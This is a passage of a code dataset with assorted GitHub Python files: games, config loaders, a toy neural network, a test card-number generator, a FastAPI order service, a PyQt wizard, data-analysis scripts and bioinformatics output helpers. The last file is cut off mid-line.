192, 253, 100, 100, WHITE, TRANSGRAY, 22, \"Place\")\n self.button(\"\", 192, 358, 100, 100, WHITE, TRANSGRAY, 22, \"Place\")\n self.button(\"\", 297, 148, 100, 100, WHITE, TRANSGRAY, 22, \"Place\")\n self.button(\"\", 297, 253, 100, 100, WHITE, TRANSGRAY, 22, \"Place\")\n self.button(\"\", 297, 358, 100, 100, WHITE, TRANSGRAY, 22, \"Place\")\n\n pg.display.flip()\n\n def button(self, msg, x, y, w, h, ic, ac, size, action=None):\n\n mouse = pg.mouse.get_pos()\n click = pg.mouse.get_pressed()\n\n if x + 100 > mouse[0] > x and y + 100 > mouse[1] > y:\n pg.draw.rect(self.screen, ac, (x, y, w, h))\n if click[0] == 1 and action != None:\n if action == \"Place\":\n print(\"h\")\n self.player_turn = False\n pg.draw.rect(self.screen, ic, (x, y, w, h))\n else:\n pg.draw.rect(self.screen, ic, (x, y, w, h))\n\n self.text(msg, size, BLACK, (x + (w / 2)), (y + (h * 1 / 3)))\n\n def text(self, text, size, color, x, y):\n font = pg.font.Font(self.font_name, size)\n text_surface = font.render(text, True, color)\n text_rect = text_surface.get_rect()\n text_rect.midtop = (x, y)\n self.screen.blit(text_surface, text_rect)\n\n def hover(self):\n while self.running:\n self.button(\"\", 87, 148, 100, 100, GREEN, RED, 22, \"Place\")\n\n pg.display.flip()\n\ng = Game()\nwhile g.running:\n g.new()\n #g.show_go_screen()\n\npg.quit()\n","repo_name":"DominicFernandez/School-Projects","sub_path":"TicTacToe.py","file_name":"TicTacToe.py","file_ext":"py","file_size_in_byte":4777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5881683842","text":"from itertools import product\nimport json\nfrom os import path, getcwd\n# \"FileNotFoundError\" is a Py 3 thing. If we're in Py 2, we mimic it with a lambda expression.\ntry:\n FileNotFoundError\nexcept NameError:\n from errno import ENOENT\n FileNotFoundError = lambda x: IOError(ENOENT, x)\n\nimport yaml\n\n\nCONFIG_DIRS = [\n getcwd(),\n '~',\n path.join('~', 'twitter'),\n]\n\nCONFIG_BASES = [\n 'twitter.yml',\n 'twitter.yaml',\n 'twitter.json'\n]\n\n\ndef configure(screen_name=None, config_file=None, app=None, **kwargs):\n \"\"\"\n Set up a config dictionary using a bots.yaml config file and optional keyword args.\n\n Args:\n screen_name (str): screen_name of user to search for in config file\n config_file (str): Path to read for the config file\n app (str): Name of the app to look for in the config file. Defaults to the one set in users.{screen_name}.\n default_directories (str): Directories to read for the bots.yaml/json file. Defaults to CONFIG_DIRS.\n default_bases (str): File names to look for in the directories. Defaults to CONFIG_BASES.\n \"\"\"\n # Use passed config file, or look for it in the default path.\n # Super-optionally, accept a different place to look for the file\n dirs = kwargs.pop('default_directories', None)\n bases = kwargs.pop('default_bases', None)\n file_config = {}\n if config_file is not False:\n config_file = find_file(config_file, dirs, bases)\n file_config = parse(config_file)\n\n # config and keys dicts\n # Pull non-authentication settings from the file.\n # Kwargs, user, app, and general settings are included, in that order of preference\n # Exclude apps and users sections from config\n config = {k: v for k, v in file_config.items() if k not in ('apps', 'users')}\n\n user_conf = file_config.get('users', {}).get(screen_name, {})\n app = app or user_conf.get('app')\n app_conf = file_config.get('apps', {}).get(app, {})\n\n # Pull user and app data from the file\n config.update(app_conf)\n config.update(user_conf)\n\n # kwargs take precendence over config file\n config.update({k: v for k, v in kwargs.items() if v is not None})\n\n return config\n\n\ndef parse(file_path):\n '''Parse a YAML or JSON file.'''\n\n _, ext = path.splitext(file_path)\n\n if ext in ('.yaml', '.yml'):\n func = yaml.safe_load\n\n elif ext == '.json':\n func = json.load\n\n else:\n raise ValueError(\"Unrecognized config file type %s\" % ext)\n\n with open(file_path, 'r') as f:\n return func(f)\n\n\ndef find_file(config_file=None, default_directories=None, default_bases=None):\n '''Search for a config file in a list of files.'''\n\n if config_file:\n if path.exists(path.expanduser(config_file)):\n return config_file\n else:\n raise FileNotFoundError('Config file not found: {}'.format(config_file))\n\n dirs = default_directories or CONFIG_DIRS\n dirs = [getcwd()] + dirs\n\n bases = default_bases or CONFIG_BASES\n\n for directory, base in product(dirs, bases):\n filepath = path.expanduser(path.join(directory, base))\n if path.exists(filepath):\n return filepath\n\n raise FileNotFoundError('Config file not found in {}'.format(dirs))\n\ndef dump(contents, file_path):\n _, ext = path.splitext(file_path)\n\n if ext in ('.yaml', '.yml'):\n func = yaml.dump\n kwargs = {'canonical': False, 'default_flow_style': False, 'indent': 4}\n\n elif ext == '.json':\n func = json.dump\n kwargs = {'sort_keys': True, 'indent': 4}\n\n else:\n raise ValueError(\"Unrecognized config file type %s\" % ext)\n\n with open(file_path, 'w') as f:\n func(contents, f, **kwargs)\n","repo_name":"kenshin579/app-quotes","sub_path":"scripts/confighelper.py","file_name":"confighelper.py","file_ext":"py","file_size_in_byte":3713,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"7108891556","text":"import numpy\n\n# Squish numbers into the range 0-1 \n# -ve inputs close to 0\n# +ve inputs close to 1\n# input: x: vector or numpy array\ndef sigmoid(x):\n return 1.0/(1+ numpy.exp(-x))\n\n# Look into ReLU Rectified Linear Unit\n# This works well for deep networks\n# This has mostly replaced use of sigmoid\n\ndef sigmoid_derivative(x):\n return x * (1.0 - x)\n\nclass neural_network:\n def __init__(self, x, y):\n self.input = x\n self.weights_1 = numpy.random.rand(self.input.shape[1], 4)\n self.weights_2 = numpy.random.rand(4, 1)\n self.y = y\n self.output = numpy.zeros(y.shape)\n\n\n def feed_forward(self):\n self.layer_1 = sigmoid(numpy.dot(self.input, self.weights_1))\n self.output = sigmoid(numpy.dot(self.layer_1, self.weights_2))\n\n\n def back_propagation(self):\n # application of the chain rule to find derivative of the loss function with respect to weights2 and weights1\n weights_2 = numpy.dot(self.layer_1.T, (2*(self.y - self.output) * sigmoid_derivative(self.output)))\n weights_1 = numpy.dot(self.input.T, (numpy.dot(2*(self.y - self.output) * sigmoid_derivative(self.output), self.weights_2.T) * sigmoid_derivative(self.layer_1)))\n \n \n # update the weights with the derivative (slope) of the loss function\n self.weights_1 += weights_1\n self.weights_2 += weights_2\n\n\nif __name__ == \"__main__\":\n X = numpy.array([[0,0,1],\n [0,1,1],\n [1,0,1],\n [1,1,1]])\n\n X_1 = numpy.array([[0,0,1,1],\n [0,1,1,1],\n [1,0,1,1],\n [1,1,1,0]])\n y = numpy.array([[0],[1],[1],[0]])\n nn = neural_network(X_1,y)\n\n for i in range(1500):\n nn.feed_forward()\n nn.back_propagation()\n\n print(nn.output)","repo_name":"domRowan/cautious-barnacle","sub_path":"cautious-barnacle/neural_network/basic_neural_network.py","file_name":"basic_neural_network.py","file_ext":"py","file_size_in_byte":1774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6114576092","text":"import sys\r\nimport random\r\nimport array\r\n\r\nccType={\"mc\":0, \"mastercard\":0, \"amex\":1, \"visa\":2, \"discover\":3, \"disc\":3}\r\nccLen={\"MC\":16, \"AMEX\":15, \"DISC\":16, \"VISA\":16}\r\nccEnum={0:\"MC\", 1:\"AMEX\", 2:\"VISA\", 3:\"DISC\"}\r\n\r\ndef fillRawDigits(len):\r\n for i in range(0, len-1):\r\n cardNumber.append(random.randint(0,9))\r\n return None\r\n\r\ndef fixRawDigits(sz):\r\n checkDigit=[0, 9, 8, 7, 6, 5, 4, 3, 2, 1]\r\n count=0\r\n sum=0\r\n for i in cardNumber:\r\n if((count&1)==(sz&1)):\r\n i=i*2\r\n if (i>9):\r\n i=i-9\r\n sum=sum+i\r\n count=count+1\r\n \r\n cardNumber.append(checkDigit[sum%10])\r\n return None\r\n\r\ndef makeMc():\r\n len=ccLen[\"MC\"]-2\r\n cardNumber.append(5)\r\n cardNumber.append(random.randint(1,5))\r\n return len\r\n\r\ndef makeDisc():\r\n len=ccLen[\"DISC\"]-4\r\n cardNumber.append(6)\r\n cardNumber.append(0)\r\n cardNumber.append(1)\r\n cardNumber.append(1)\r\n return len\r\n\r\ndef makeVisa():\r\n len=ccLen[\"VISA\"]-1\r\n cardNumber.append(4)\r\n return len\r\n\r\ndef makeAmex():\r\n len=ccLen[\"AMEX\"]-2\r\n cardNumber.append(4)\r\n cardNumber.append(random.randint(4, 9))\r\n return len\r\n\r\nccFunc={0:makeMc, 1:makeAmex, 2:makeVisa, 3:makeDisc}\r\ncardNumber=[]\r\n\r\ndef makeCC(ccName):\r\n if (len(ccName)==0):\r\n raise Exception('ccName', 'isNull')\r\n \r\n try:\r\n ccTypeEnum=ccType[ccName]\r\n except KeyError:\r\n print (\"ccName must be one of: \"),\r\n print (ccType.keys())\r\n return None\r\n\r\n random.seed()\r\n #invoke fn pointer from hash\r\n sz=ccFunc[ccTypeEnum]()\r\n fillRawDigits(sz)\r\n fixRawDigits(ccLen[ccEnum[ccTypeEnum]])\r\n \r\n for i in cardNumber:\r\n sys.stdout.write(str(i))\r\n \r\n return None\r\n\r\nif __name__=='__main__':\r\n if len(sys.argv)!=2:\r\n print(\"usage: CreditCardMaker \\ntypes are: \",)\r\n print(ccType.keys())\r\n quit()\r\n\r\n jnk, ccName=sys.argv\r\n makeCC(ccName)\r\n ","repo_name":"abawany/ab-code-samples","sub_path":"CreditCardMaker.py","file_name":"CreditCardMaker.py","file_ext":"py","file_size_in_byte":1956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13720351905","text":"import os \r\nimport time\r\n\r\nloopNums = [1, 10, 20, 30, 40]\r\neachLoop = 1\r\n\r\nfor num in loopNums:\r\n totalTime = 0\r\n f = open(str(num)+\".txt\", \"w\")\r\n f.write(\"8192 8192 4 4 \"+ str(num))\r\n f.close()\r\n for i in range(eachLoop):\r\n start = time.time()\r\n os.system(\"seq-algo.exe <\" + str(num) + \".txt\")\r\n end = time.time()\r\n \r\n totalTime+= (end-start)\r\n avTime = totalTime\r\n print(\"Average Time of 8192x8192 grid for \" + str(num) + \" loop: \" + str(avTime))","repo_name":"Kerim-13/Homeworks","sub_path":"CENG478-Project/tester.py","file_name":"tester.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17344478742","text":"from PyQt5.QtCore import pyqtSlot, pyqtSignal\nfrom PyQt5.QtWidgets import QWizard, QMessageBox, QFileDialog, QDialog, QInputDialog, QAbstractItemView, QVBoxLayout, \\\n QWidget\n\nfrom mcjsontool.resource import fileloaders\nfrom mcjsontool.resource.workspace import Workspace\nfrom .workspacewizard_ui import Ui_Wizard\n\n\nclass WorkspaceWizard(QWizard, Ui_Wizard):\n newWorkspaceEmitted = pyqtSignal(Workspace, str)\n\n def __init__(self, parent=None):\n super().__init__(parent)\n\n self.setupUi(self)\n self.workspaceObject = None\n\n self.locationBrowse.clicked.connect(self.browseButtonCB)\n self.edit_widgets = []\n\n self.settingsList.setSelectionMode(QAbstractItemView.SingleSelection)\n self.settingsList.currentRowChanged.connect(self.newSelection)\n self.addButton.clicked.connect(self.addEditWidget)\n self.removeButton.clicked.connect(self.removeEditWidget)\n self.finished.connect(self.on_finish)\n self.selected = None\n\n @pyqtSlot()\n def addEditWidget(self):\n list_ = [x.__name__ for x in fileloaders.fileloaders]\n user_select, ok = QInputDialog.getItem(self, \"Select source type\", \"Please select a source type from the options below\", list_, editable=False)\n if ok:\n i = list_.index(user_select)\n edit_widget = fileloaders.fileloaders[i].create_edit_widget(self.settingsBox)\n self.edit_widgets.append(edit_widget)\n self.update_list()\n\n @pyqtSlot(int)\n def newSelection(self, x):\n if 0 <= x < len(self.edit_widgets):\n if self.settingsBox.layout() is None:\n layout = QVBoxLayout()\n layout.addWidget(self.edit_widgets[x])\n self.selected = self.edit_widgets[x]\n self.settingsBox.setLayout(layout)\n else:\n self.settingsBox.layout().removeWidget(self.selected)\n self.selected: QWidget\n self.selected.setParent(self)\n self.settingsBox.layout().addWidget(self.edit_widgets[x])\n self.selected = self.edit_widgets[x]\n self.update()\n\n @pyqtSlot()\n def removeEditWidget(self):\n if self.settingsList.selectedIndexes():\n i = self.settingsList.selectedIndexes()[0].row()\n del self.edit_widgets[i]\n self.update_list()\n\n def update_list(self):\n self.settingsList.clear()\n for i in self.edit_widgets:\n self.settingsList.addItem(str(i))\n\n @pyqtSlot()\n def browseButtonCB(self):\n filepath, *a = QFileDialog.getSaveFileName(parent=self, caption=\"Select path to save workspace\", filter=\"Workspaces (*.mcjtwp)\")\n if filepath:\n self.locationEdit.setText(filepath)\n\n @pyqtSlot(int)\n def on_finish(self, result):\n if result == QDialog.Rejected:\n return\n else:\n workspace = Workspace(self.nameEdit.text(), Workspace.EDITMODE_EDIT if self.editMode.isChecked() else Workspace.EDITMODE_RESOURCEPACK)\n for i in self.edit_widgets:\n workspace.providers.append(i.create_provider())\n workspace.refresh_file_cache(wait_for_complete=False)\n workspace.save_to_file(self.locationEdit.text())\n self.newWorkspaceEmitted.emit(workspace, self.locationEdit.text())\n\n def validateCurrentPage(self):\n if self.currentPage() == self.nameTypePage:\n if self.nameEdit.text() is not \"\" and self.locationEdit.text() is not \"\":\n return True\n else:\n # noinspection PyCallByClass\n QMessageBox.critical(self, \"Error\", \"Please fill in all fields.\")\n return False\n elif self.currentPage() == self.sourcesPage:\n if all((x.is_valid() for x in self.edit_widgets)):\n return True\n else:\n QMessageBox.critical(self, \"Error\", \"Please fill in all fields (make sure you check all sources)\")\n return False\n return True\n","repo_name":"mincrmatt12/MCJsonTool","sub_path":"mcjsontool/ui/workspace/workspacewizard.py","file_name":"workspacewizard.py","file_ext":"py","file_size_in_byte":4063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73333314113","text":"def calcula_percent(valor, porcentagem):\r\n return valor * (porcentagem/100)\r\n\r\n#Letra a)\r\ndef adicionar_taxas(vlr_base):\r\n total = vlr_base\r\n total += calcula_percent(vlr_base, 50) #Adição Imposto Importação\r\n imposto_circulacao = calcula_percent(total, 3) #Imposto Circulação\r\n total += imposto_circulacao #Adicação do Imposto Circulação\r\n #Adição Taxa de Entrega\r\n total += calcula_percent(vlr_base, 10) + calcula_percent(imposto_circulacao, 2)\r\n\r\n return total\r\n\r\n#Letra b)\r\ndef dar_desconto(codigo):\r\n xx = codigo // 100\r\n yy = codigo % 100\r\n\r\n preco_basico = xx * 15 + yy\r\n percentual_desconto = yy\r\n\r\n total = preco_basico - calcula_percent(preco_basico, percentual_desconto)\r\n \r\n return total\r\n\r\ndef main():\r\n print(\"Letra a)\")\r\n vlr_produto = float(input(\"Digite o valor do produto: \"))\r\n print(\"Valor + Taxas:\", adicionar_taxas(vlr_produto), end=\"\\n\"*2)\r\n \r\n print(\"Letra b)\")\r\n codigo_produto = int(input(\"Digite o código do produto(4 digitos): \"))\r\n print(\"Valor promoção:\", dar_desconto(codigo_produto))\r\n\r\nif __name__ == \"__main__\":\r\n main()","repo_name":"Lima001/BCC-Algoritmos","sub_path":"Lista-AER-Alg-19/GEL-AER-Alg-19-Ex-8.py","file_name":"GEL-AER-Alg-19-Ex-8.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29859776245","text":"import logging\nimport time\n\nfrom fastapi import BackgroundTasks\n\nimport stock_exchange\nfrom models import CreateOrderModel, CreateOrderResponseModel, Order, OrderStatus\nfrom orders_dao import dao\nfrom stock_exchange import OrderPlacementError\n\nPLACE_ORDER_MAX_RETRIES = 5\n\nlogger = logging.getLogger(__name__)\n\n\ndef create_and_place_order(order_request: CreateOrderModel, background_tasks: BackgroundTasks) \\\n -> CreateOrderResponseModel:\n order = order_request.to_order_entity()\n order = dao.create_order(order)\n try:\n stock_exchange.place_order(order)\n order = dao.update_order_status(order.id, OrderStatus.SUCCESS)\n except OrderPlacementError:\n logger.warning(f\"Error while placing order with id {order.id}. Order placement will be retried\")\n background_tasks.add_task(retry_order_placement, order)\n return order\n\n\ndef retry_order_placement(order: Order):\n for i in range(PLACE_ORDER_MAX_RETRIES):\n try:\n time.sleep(2)\n stock_exchange.place_order(order)\n order = dao.update_order_status(order.id, OrderStatus.SUCCESS)\n return\n except OrderPlacementError:\n logger.warning(f\"Order placement for id {order.id} failed on retry attempt {i+1}\")\n logger.error(f\"Order placement for id {order.id} failed even after {PLACE_ORDER_MAX_RETRIES} attempts. \"\n f\"Status will be updated to failure.\")\n dao.update_order_status(order.id, OrderStatus.FAILURE)\n","repo_name":"vinaynikhil313/exercise-backend","sub_path":"app/orders_service.py","file_name":"orders_service.py","file_ext":"py","file_size_in_byte":1488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"857245346","text":"import json\nimport os\nimport urllib2\nfrom urllib import urlencode\n\nfrom careerjet_api_client import CareerjetAPIClient\nfrom django.http import JsonResponse, HttpResponseBadRequest, HttpResponse\n\nfrom models import SearchResult, SavedJob, Job, User\n\ncareerjet_key = os.environ.get('CAREERJET_KEY')\ncj = CareerjetAPIClient(\"en_US\")\nindeed_key = os.environ.get('INDEED_KEY')\n\n\ndef careerjet_query(job, location, url, user_ip, user_agent):\n cj_query = {\n 'location': location,\n 'keywords': job,\n 'affid': careerjet_key,\n 'user_ip': user_ip,\n 'url': url,\n 'user_agent': user_agent,\n }\n\n # Get the first results page\n result_json = cj.search(cj_query)\n\n # Get the other pages\n all_jobs = result_json['jobs']\n for page in range(2, result_json['pages']):\n cj_query['page'] = page\n cj_query['url'] = url\n result_json = cj.search(cj_query)\n all_jobs += result_json['jobs']\n\n return all_jobs\n\n\ndef indeed_query(job, location, user_ip, user_agent):\n all_jobs = []\n start = 0\n num_requests = 0\n while start < 1000:\n query = {\n 'publisher': indeed_key,\n 'v': 2,\n 'format': 'json',\n 'q': job,\n 'l': location,\n 'limit': 25,\n 'latlong': 1,\n 'userip': user_ip,\n 'useragent': user_agent,\n 'start': start\n }\n url = \"http://api.indeed.com/ads/apisearch?\" + urlencode(query)\n response = json.loads(urllib2.urlopen(url).read())\n num_requests += 1\n all_jobs += response['results']\n start = response['end'] + 1\n\n if len(response['results']) < 25:\n break\n\n return all_jobs\n\n\ndef indeed_single_job_query(job_id, user_ip, user_agent):\n query = {\n 'publisher': indeed_key,\n 'v': 2,\n 'format': 'json',\n 'latlong': 1,\n 'userip': user_ip,\n 'useragent': user_agent,\n 'jobkeys': job_id\n }\n url = \"http://api.indeed.com/ads/apigetjobs?\" + urlencode(query)\n response = json.loads(urllib2.urlopen(url).read())\n\n return response['results']\n\n\ndef jobs(request):\n # variables declared with HTTP GET, otherwise defaults provided\n job = request.GET.get('job', 'java')\n location = request.GET.get('location', 'california')\n\n # TODO - These should be found in the HTTP request headers\n user_ip = request.GET.get('user_ip', '11.22.33.44')\n url = request.GET.get('url', 'http://www.example.com/jobsearch?q=python&l=london')\n user_agent = request.GET.get('user_agent', 'Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0')\n\n # Look for keywords in database\n results = SearchResult.objects.filter(job=job, location=location)\n\n # If length of results is 0\n if len(results) == 0:\n all_jobs = indeed_query(job, location, user_ip, user_agent)\n new_result = SearchResult(job=job,\n location=location,\n result=json.dumps(all_jobs, sort_keys=True, indent=0, separators=(',', ': ')))\n\n new_result.save()\n results = [new_result]\n\n return JsonResponse({\n 'jobs': json.loads(results[0].result)\n })\n\n\ndef save_job(request):\n user_id = request.GET.get('user', 0)\n users = User.objects.filter(id=user_id)\n if len(users) == 0:\n return HttpResponseBadRequest()\n user = users[0]\n\n job_id = request.GET.get('jobid')\n if job_id == None:\n return HttpResponseBadRequest()\n\n # Check if job is already saved\n results = SavedJob.objects.filter(job_id=job_id)\n if len(results) == 0:\n # Save job\n new_saved = SavedJob(user_id=user, job_id=job_id)\n new_saved.save()\n\n return HttpResponse(status=204)\n\n\ndef get_saved_jobs(request):\n user_id = request.GET.get('user', 0)\n users = User.objects.filter(id=user_id)\n if len(users) == 0:\n return HttpResponseBadRequest()\n user = users[0]\n\n # Get saved jobs\n saved = SavedJob.objects.filter(user_id=user)\n\n # Convert saved entries into jobs\n job_data = []\n for saved_job in saved:\n job = _get_job(request, saved_job.job_id)\n if job is not None:\n job_data.append(job)\n\n return JsonResponse({\n 'jobs': job_data\n })\n\n\ndef delete_saved_job(request):\n user_id = request.GET.get('user', 0)\n users = User.objects.filter(id=user_id)\n if len(users) == 0:\n return HttpResponseBadRequest()\n user = users[0]\n\n job_id = request.GET.get('jobid')\n if job_id is None:\n return HttpResponseBadRequest()\n\n # Check if job is already saved\n results = SavedJob.objects.filter(user_id=user, job_id=job_id)\n for res in results:\n res.delete()\n\n return HttpResponse(status=204)\n\n\ndef _get_job(request, job_id):\n user_ip = request.GET.get('user_ip', '11.22.33.44')\n url = request.GET.get('url', 'http://www.example.com/jobsearch?q=python&l=london')\n user_agent = request.GET.get('user_agent', 'Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0')\n\n # Get job\n jobs = Job.objects.filter(job_id=job_id)\n if len(jobs) > 0:\n # Have cached job, return data\n job = jobs[0]\n return json.loads(job.data)\n\n # Get data from API\n response = indeed_single_job_query(job_id, user_ip, user_agent)\n if len(response) > 0:\n new_job = Job(job_id=job_id,\n data=json.dumps(response[0], sort_keys=True, indent=0, separators=(',', ': ')))\n new_job.save()\n return json.loads(new_job.data)\n\n return None\n\n\ndef get_job(request):\n job_id = request.GET.get('jobid')\n if job_id is None:\n return HttpResponseBadRequest()\n return JsonResponse({\n 'job': _get_job(request, job_id)\n })\n\n\ndef get_id(request):\n token = request.GET.get('token')\n if token is None:\n return HttpResponseBadRequest()\n users = User.objects.filter(g_id=token)\n\n user = None\n if len(users) == 0:\n user = User(g_id=token)\n user.save()\n else:\n user = users[0]\n\n return JsonResponse({\n 'user_id': user.id\n })\n","repo_name":"Ginnyxue/CS411A1Group3","sub_path":"server/server/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13811368119","text":"import json\n\n#An example class is given. 'time' is input in 24 hour format, no colon\n#'prompt' will give a popup if True, and just go to class otherwise\nschedule = [\n {'class_name': 'example', 'time': 1100, 'days':['M','W','F'], 'url':'www.google.com', 'prompt':True},\n {'class_name': 'ex2', 'time': 1530, 'days':['T','TH'], 'url': '', 'prompt': True}\n #Add more here\n]\n\nf = open('schedule.json', 'w')\njson.dump(schedule, f)\n","repo_name":"SahilJain314/AutoZoom","sub_path":"schedule_ex.py","file_name":"schedule_ex.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"71491221634","text":"import os\nimport requests\nimport csv\nimport datetime\nimport matplotlib.pyplot as plt\n\nbuckets = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n\nif not os.path.isfile('data.csv'):\n print('Downloading data...')\n try:\n data = requests.get('https://coronavirus.data.gov.uk/downloads/csv/coronavirus-cases_latest.csv')\n except Exception as e:\n print('Failed to retrieve data:')\n print(e)\n exit(1)\n with open('data.csv', 'w') as f:\n f.write(data.text)\n\n# Parse and bucket the data\nprint('Analysing data...')\nwith open('data.csv') as f:\n data = csv.reader(f)\n lastUpdated = '0'\n for row in data:\n if row[2] == 'ltla':\n firstDigit = int(str(row[4])[0])\n buckets[firstDigit] = buckets[firstDigit] + 1\n if row[3] != 'Specimen date':\n lastUpdated = max(lastUpdated, row[3])\n\n# Ignore 0s\nbuckets = buckets[1:]\n\n# Get percentages\ntotal = sum(buckets)\nfor i in range(0, len(buckets)):\n buckets[i] = 100 * buckets[i] / total\n\n# Plot\nprint('Plotting data...')\nfig, ax = plt.subplots()\nax.plot(range(1, 10), buckets, label = 'COVID stats')\nax.plot(range(1, 10), [30.1, 17.6, 12.5, 9.7, 7.9, 6.7, 5.8, 5.1, 4.6], label = 'Benford\\'s law')\nax.set(xlabel = 'First digit', ylabel = 'Frequency (%)', title = 'UK COVID statistics follow Benford\\'s law (as of ' + datetime.date.today().isoformat() + ')')\nplt.legend()\nif os.environ.get('CI') == 'true' or os.environ.get('HEADLESS') == 'true':\n plt.savefig('output.png')\nelse:\n plt.show()\n","repo_name":"domdomegg/uk-covid-stats-benfords-law","sub_path":"analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"15644630081","text":"import tensorflow as tf\nimport numpy as np\n\ndef runDNN(Xtrain, Ytrain,Xtest):\n\n #define the model features\n #FEATURES = ['height/width','depth']\n FEATURES = ['outputs']\n feature_cols = [tf.feature_column.numeric_column(k) for k in FEATURES]\n\n #define the DNN regressor\n regressor = tf.contrib.learn.DNNRegressor(feature_columns=feature_cols, hidden_units=[1,1])\n\n #define the input functions for training\n def get_input_fn(xData, yData=None, num_epochs=None, shuffle=True):\n return tf.estimator.inputs.numpy_input_fn(\n #x={FEATURES[i]: xData[:,i] for i in range(0,2)},\n x={FEATURES[0]: xData},\n y=yData,\n num_epochs=num_epochs,\n shuffle=shuffle)\n\n #training\n regressor.fit(input_fn=get_input_fn(Xtrain, Ytrain, None, False), steps=5000)\n\n #evaluation and getting loss\n ev = regressor.evaluate(input_fn=get_input_fn(Xtrain, Ytrain, 1, False))\n loss_score = ev[\"loss\"]\n print(\"Loss: {0:f}\".format(loss_score))\n\n #testing and predicting\n yhat = regressor.predict(input_fn=get_input_fn(Xtest, None, 1, False))\n predictions = np.array(list(p for p in yhat))\n return predictions","repo_name":"RajatBhageria/ComputerVision-Absolute-Depth-Detection-With-Single-Image","sub_path":"deepNeuralNet.py","file_name":"deepNeuralNet.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"61"} +{"seq_id":"3115330881","text":"import time\nfrom Bio import SeqIO\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport os, glob\nimport numpy as np\nimport matplotlib\n\ndef get_names(roi_df):\n print('\\n{:#^50}'.format(' Finalising roi names '))\n start_time = time.time()\n counter = 1\n for index, row in roi_df.iterrows():\n roi_df.loc[index, 'roi_new'] = row['roi'].split('~')[0] + '~roi_' + str(counter)\n counter = counter + 1\n end_time = '{:.3f}'.format(time.time() - start_time)\n print('{:#^50}'.format(' Done: ' + end_time + ' seconds '))\n return roi_df\n\ndef output_roi_seqs(roi_df,roi_dna,output_folder):\n print('\\n{:#^50}'.format(' Outputting roi sequences '))\n start_time = time.time()\n final_roi_dna = []\n for i in roi_df['roi'].unique():\n for j in roi_dna:\n if j.id == i:\n j.id = roi_df['roi_new'][roi_df['roi'] == i].iloc[0]\n j.description = ''\n j.name = ''\n final_roi_dna.append(j)\n SeqIO.write(final_roi_dna, output_folder + '/hafeZ_all_roi_seqs.fasta', 'fasta')\n end_time = '{:.3f}'.format(time.time() - start_time)\n print('{:#^50}'.format(' Done: ' + end_time + ' seconds '))\n\ndef output_roi_orfs(roi_orf_dna,roi_df,output_folder,roi_orf_aa):\n print('\\n{:#^50}'.format(' Outputting roi orfs '))\n start_time = time.time()\n for i in roi_df['roi'].unique():\n orf_list = []\n for j in roi_orf_dna[i]:\n name = roi_df['roi_new'][roi_df['roi'] == i].iloc[0]\n j.id = name + '~' + j.id.split('~')[-1]\n orf_list.append(j)\n SeqIO.write(orf_list, output_folder + '/hafeZ_orfs_dna_' + name + '.fasta', 'fasta')\n for i in roi_df['roi'].unique():\n orf_list = []\n for j in roi_orf_aa[i]:\n name = roi_df['roi_new'][roi_df['roi'] == i].iloc[0]\n j.id = name + '~' + j.id.split('~')[-1]\n orf_list.append(j)\n SeqIO.write(orf_list, output_folder + '/hafeZ_orfs_aa_' + name + '.faa', 'fasta')\n end_time = '{:.3f}'.format(time.time() - start_time)\n print('{:#^50}'.format(' Done: ' + end_time + ' seconds '))\n\ndef output_prophage_graphs(roi_df,depths,output_folder,median,mad):\n print('\\n{:#^50}'.format(' Making roi figures '))\n start_time = time.time()\n matplotlib.use('Agg')\n roi_df['contig'] = roi_df['roi'].str.split('~').str[0]\n roi_df = roi_df.astype({'start_pos': int, 'end_pos': int})\n for i in roi_df['contig'].unique():\n z = [((0.6745*(x - median))/mad) for x in depths[i]]\n fig = plt.gcf()\n fig.set_size_inches(18.5, 10.5)\n plt.plot(z)\n pos = 4\n for index, row in roi_df[roi_df['contig'] == i].iterrows():\n if (row['circular'] == False) | ((row['circular'] == True) & (row['roi'].split('_')[-1] == 'c1')):\n plt.axvspan(row['start_pos'], row['end_pos'], color='r', alpha=0.5, lw=0)\n plt.annotate(row['roi_new'], xy=(row['start_pos'], pos), xytext=(row['start_pos'] + len(z)/10, pos + 1),\n arrowprops=dict(facecolor='black', arrowstyle = '->', connectionstyle='arc3', lw =2))\n elif (row['circular'] == True) & (row['roi'].split('_')[-1] == 'c2'):\n plt.axvspan(row['start_pos'], row['contig_len'], color='r', alpha=0.5, lw=0)\n plt.axvspan(0,row['end_pos'], color='r', alpha=0.5, lw=0)\n plt.annotate(row['roi_new'], xy=(row['start_pos'], pos), xytext=(row['start_pos'] + len(z)/10, pos + 1),\n arrowprops=dict(facecolor='black', arrowstyle = '->', connectionstyle='arc3', lw =2))\n plt.annotate('', xy=(row['end_pos'], pos),\n arrowprops=dict(facecolor='black', arrowstyle = '->', connectionstyle='arc3', lw =2))\n pos = pos + (np.max(z)/len(roi_df[roi_df['contig'] == i]))\n plt.savefig(output_folder + 